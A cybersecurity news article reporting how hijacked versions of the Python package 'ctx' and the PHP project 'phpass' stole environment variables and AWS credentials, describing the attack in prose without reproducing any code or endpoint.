The cybersecurity experts at Sonatype have detected that recent attacks on a popular Python package, ‘ctx’ have resulted in a legitimate version being replaced by a malicious one. The malware has been programmed to allow attackers to acquire credentials to access AWS.
Moreover, a forked PHP project, known as “phpass” was also compromised with an identical malicious payload in a repo hijacking attack. Ctx is a Python package that, on average, gets over 22,000 downloads per week and provides developers with a simple, but complete list of dict/objects.
Sonatype-2022-3060 is the identifier assigned to the compromised versions of “ctx”. While the Packagist, on the other hand, has already contained the compromised ‘phpass’ versions.
Over the course of its lifetime, the PHPass framework has been downloaded more than 2.5 million times through the Packagist repository. However, it is believed that the number of malicious versions has been considerably fewer.
‘ctx’ Replaced with Malware
On the PyPI registry for the Ctx package, the latest version of 0.1.2 showed a date of publication of December 19, 2014, until this week, as you see in the below image:-
In addition, newer versions containing malicious code appear this week, including 0.2.2, 0.2.6, and above:-
Since May 21st, 2022, the “ctx” version 0.1.2 has been removed from the PyPI registry and was altered with the code shown above, to contain the contents of this file.
Based on an enumerated list of your environment variables, the simplistic code applies base64 encoding to them and uploads them to the endpoint.
It seems several Reddit users found out about this incident and are reporting that they have already reported malicious versions of PyPI to the PyPI registry.
Although you are using PyPI’s latest copy of the safe version 0.1.2, the latest version on PyPI appears to comprise malicious code as caught today, so it would be prudent to use due diligence and inspect what is contained in your application.
‘PHPass’ Packagist project also compromised
The ‘PHPass’ Packagist project has also been compromised by an exploit on its fork of the PHP repo. There are two attacks that appear to be breaching developers’ AWS credentials and both of these attacks claim to steal their environment variables to do so.
While there is another malicious version of ‘Ctx’ that has targeted all the available environment variables. It looks like ‘phpass’ has been committed to GitHub for 5 days and there are commits from that endpoint.
Moreover, it’s been claimed by the Sonatype that the ‘hautelook/phpass’ was not widely installed and that’s why they have contained the problems.
Several open-source repositories are crucial components of the software supply chain. Maven, NPM, Packages, PyPi, and RubyGems are among the most popular.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.
